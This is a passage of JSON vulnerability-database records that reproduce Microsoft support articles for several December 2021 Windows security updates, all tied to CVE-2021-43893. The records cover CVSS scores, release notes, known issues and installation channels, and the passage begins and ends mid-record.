"baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008282 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008282", "href": "https://support.microsoft.com/en-us/help/5008282", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:42", "description": "None\n**11/9/2021** \n**IMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2021. There will be a monthly security release (known as a \u201cB\u201d release) for December 2021. Normal monthly servicing for both B and C releases will resume in January 2022. \n\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1507, see its update history page.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Adds support for the cancellation of daylight savings time for the Republic of Fiji for 2021.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues in this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>). If you are using Windows Update, the latest SSU (KB5001399) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008230>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5008230](<https://download.microsoft.com/download/c/5/9/c59d220f-5eff-4e13-a3e5-caa3a384840d/5008230.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008230 (OS Build 10240.19145)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008230", "href": "https://support.microsoft.com/en-us/help/5008230", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:41", "description": "None\n**11/9/2021** \n**IMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2021. There will be a monthly security release (known as a \u201cB\u201d release) for December 2021. Normal monthly servicing for both B and C releases will resume in January 2022.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * Addresses a known issue that might prevent Microsoft Defender for Endpoint from starting or running on devices that have a Windows Server Core installation.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>) and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n### Windows 10 servicing stack update - 20348.403\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter you install this update on a server that is running Windows Server 2022, you might not be able to use Remote Desktop to reach the server. Eventually, the server might stop responding. Additionally, a black screen might appear, and signing in and general performance might slow.| This issue is resolved in KB5010197. \nAfter installing this update, text input using a Japanese IME might be entered out of order or the text cursor might move unexpectedly in apps that use the [multibyte character set (MBCS)](<https://docs.microsoft.com/cpp/text/support-for-multibyte-character-sets-mbcss>). This issue affects both the Microsoft Japanese IME and third-party Japanese IMEs.| This issue is resolved in KB5009555. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015879 for all releases starting September 14, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008223>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Microsoft Server operating system-21H2**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File Information**For a list of the files that are provided in this update, download the [file information for cumulative update 5008223](<https://download.microsoft.com/download/7/e/0/7e01c734-9a98-4d7d-9182-35f5b2cc8f45/5008223.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 20348.403](<https://download.microsoft.com/download/c/d/2/cd29848b-d5fa-406e-a778-4fad35c92e4a/SSU_version_20348_403.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008223 (OS Build 20348.405)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008223", "href": "https://support.microsoft.com/en-us/help/5008223", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:39", "description": "None\n**11/9/2021** \n**IMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2021. There will be a monthly security release (known as a \u201cB\u201d release) for December 2021. Normal monthly servicing for both B and C releases will resume in January 2022. \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1909, see its update history page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the Windows release health dashboard.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Adds support for the cancellation of daylight savings time for the Republic of Fiji for 2021.\n * Addresses an issue that incorrectly renders some variable fonts.\n * Addresses an issue that occurs when a dialog opens within Internet Explorer.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n### Windows 10 servicing stack update - 18363.1912\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. \n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues in this update\n\n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).Prerequisite:You must install the July 13, 2021 SSU (KB5004748) before installing the LCU. **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008206>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information **For a list of the files that are provided in this update, download the [file information for cumulative update 5008206](<https://download.microsoft.com/download/f/7/8/f787e576-b438-421e-9fcb-106adeb77c31/5008206.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 18363.1912](<https://download.microsoft.com/download/c/d/2/cd2fec3e-46d8-4e1b-9147-3559d6aca1bd/SSU_version_18362_1912.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008206 (OS Build 18363.1977)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008206", "href": "https://support.microsoft.com/en-us/help/5008206", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:43", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT** Windows 7, Windows Server 2008 R2, Windows Embedded Standard 7, and Windows Embedded POS Ready 7 have reached the end of mainstream support and are now in extended security update (ESU) support. Windows Thin PC has reached the end of mainstream support; however, ESU support is not available.Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5007236](<https://support.microsoft.com/help/5007236>) (released November 9, 2021) and addresses the following issue:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates. Extended support ended as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ended on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ended on October 13, 2020.\n * For Windows Embedded POS Ready 7, extended support ended on October 12, 2021.\n * For Windows Thin PC, extended support ended on October 12, 2021. Note that ESU support is not available for Windows Thin PC.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5006749](<https://support.microsoft.com/help/5006749>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008244>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008244](<https://download.microsoft.com/download/7/d/1/7d1ed1cd-9408-491d-8ed2-7f6055b1a0f9/5008244.csv>).\n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008244 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008244", "href": "https://support.microsoft.com/en-us/help/5008244", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:41", "description": "None\n**11/9/2021** \n**IMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2021. There will be a monthly security release (known as a \u201cB\u201d release) for December 2021. Normal monthly servicing for both B and C releases will resume in January 2022. \n\nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 11 (original release), see its update history page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the Windows release health dashboard.\n\n![Your browser does not support video. Install Microsoft Silverlight, Adobe Flash Player, or Internet Explorer 9.](https://support.content.office.net/en-us/media/4873755a-8b1e-497e-bc54-101d1e75d3e7.png)\n\n## Highlights \n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n### Windows 11 servicing stack update - 22000.345\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n**Applies to**| **Symptom**| **Workaround** \n---|---|--- \nAll users| After installing Windows 11, some image editing programs might not render colors correctly on certain high dynamic range (HDR) displays. This is frequently observed with white colors, which could display in bright yellow or other colors.This issue occurs when certain color-rendering Win32 APIs return unexpected information or errors under specific conditions. Not all color profile management programs are affected, and color profile options available in the Windows 11 Settings page, including Microsoft Color Control Panel, are expected to function correctly.| This issue is resolved in KB5008353. \nAll users| After installing this update, text input using a Japanese IME might be entered out of order or the text cursor might move unexpectedly in apps that use the [multibyte character set (MBCS)](<https://docs.microsoft.com/cpp/text/support-for-multibyte-character-sets-mbcss>). This issue affects both the Microsoft Japanese IME and third-party Japanese IMEs.| This issue is resolved in KB5009566. \nAll users| Recent emails might not appear in the search results of the Microsoft Outlook desktop app. This issue is related to emails that have been stored locally in a PST or OST files. It might affect POP and IMAP accounts, as well as accounts hosted on Microsoft Exchange and Microsoft 365. If the default search in the Microsoft Outlook app is set to server search, the issue will only affect the advanced search.| This issue is resolved in KB5010386. \nAll users| When attempting to reset a Windows device with apps that have folders with [reparse data](<https://docs.microsoft.com/windows/win32/fileio/reparse-points>), such as OneDrive or OneDrive for Business, files which have been downloaded or synced locally from OneDrive might not be deleted when selecting the \u201cRemove everything\u201d option. This issue might be encountered when attempting a [manual reset initiated within Windows](<https://support.microsoft.com/windows/recovery-options-in-windows-31ce2444-7de3-818c-d626-e3b5a3024da5#bkmk_win11_reset_pc>) or a remote reset. Remote resets might be initiated from Mobile Device Management (MDM) or other management applications, such as [Microsoft Intune](<https://docs.microsoft.com/mem/intune/remote-actions/device-fresh-start>) or third-party tools. OneDrive files that are \u201ccloud only\u201d or have not been downloaded or opened on the device are not affected and will not persist, as the files are not downloaded or synced locally.**Note** Some device manufacturers and some documentation might call the feature to reset your device, \"Push Button Reset\", \"PBR\", \"Reset This PC\", \"Reset PC\", or \"Fresh Start\".| This issue was addressed in KB5011493. Some devices might take up to seven (7) days after the installation of KB5011493 to fully address the issue and prevent files from persisting after a reset. For immediate effect, you can manually trigger Windows Update Troubleshooter using the instructions in [Windows Update Troubleshooter](<https://support.microsoft.com/windows/windows-update-troubleshooter-19bc41ca-ad72-ae67-af3c-89ce169755dd>). If you are part of an organization that manages devices or prepared OS images for deployment, you can also address this issue by applying a compatibility update for installing and recovering Windows. Doing that makes improvements to the \"safe operating system\" (SafeOS) that is used to update the Windows recovery environment (WinRE). You can deploy these updates using the instructions in [Add an update package to Windows RE](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/add-update-to-winre?view=windows-11>) using [KB5012414](<https://support.microsoft.com/help/5012414>) for Windows 11 (original release).**Important **If devices have already been reset and OneDrive files have persisted, you must use a workaround above or perform another reset after applying one of the workarounds above. \n \n## How to get this update\n\n**Before installing this update**Microsoft combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008215>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 11**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the 